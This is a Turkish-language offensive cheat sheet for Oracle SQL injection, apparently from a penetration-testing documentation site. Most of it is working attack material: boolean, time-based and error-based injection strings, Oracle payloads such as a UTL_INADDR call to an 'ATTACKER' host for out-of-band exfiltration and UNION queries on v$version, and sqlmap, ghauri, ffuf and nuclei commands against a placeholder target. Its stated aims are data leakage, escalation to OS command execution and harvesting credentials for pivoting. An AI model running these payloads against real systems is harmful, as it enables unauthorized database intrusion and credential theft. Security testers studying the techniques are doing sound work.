Oracle injection
web sqli
Oracle injection SQL/Cypher sorgusuna kullanıcı girdisinin birleşmesiyle oluşur. Amaç: DBMS fingerprint, veri sızıntısı ve mümkünse OS/RCE yükseltmesi.
Metodoloji
Section titled “Metodoloji”-
Enjekte edilebilir parametreyi (GET/POST/JSON/header/cookie) izole et.
-
Boolean/time/OAST ile DBMS ve tekniği doğrula.
-
Veri okuma → dosya/OS komutuna yükselt.
-
Kanıt paketle; pivot için credential çıkar.
Tespit
Section titled “Tespit”' OR '1'='11' AND SLEEP(5)-- -1' AND 1=CAST((SELECT version()) AS int)-- -sqlmap -u 'https://TARGET/item?id=1' --batch --banner --current-user --current-dbghauri -u 'https://TARGET/item?id=1' --dbsOracle injection
Section titled “Oracle injection”1' AND 1=UTL_INADDR.GET_HOST_ADDRESS('ATTACKER')--1' UNION SELECT NULL,banner,NULL FROM v$version--1' AND EXISTS(SELECT * FROM all_users)--sqlmap -u 'https://TARGET/item?id=1' --dbms=oracle --batch --tablesOperasyon notları
Section titled “Operasyon notları”Oracle injection sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.
Ek komutlar
Section titled “Ek komutlar”curl -sk https://TARGET/robots.txtnuclei -u https://TARGET -as -silentffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403GET / HTTP/1.1Host: TARGETAccept: */*mkdir -p evidence/web && tee evidence/web/notes.txtBu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.
Ek keşif komutları
Section titled “Ek keşif komutları”curl -sk https://TARGET/robots.txtcurl -sk https://TARGET/sitemap.xmlffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403nuclei -u https://TARGET -as -silentGET / HTTP/1.1Host: TARGETAccept: */*Kanıt toplama
Section titled “Kanıt toplama”mkdir -p evidence/web && tee evidence/web/notes.txtrequest/responsezaman damgasıkullanılan hesapetki özeticurl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html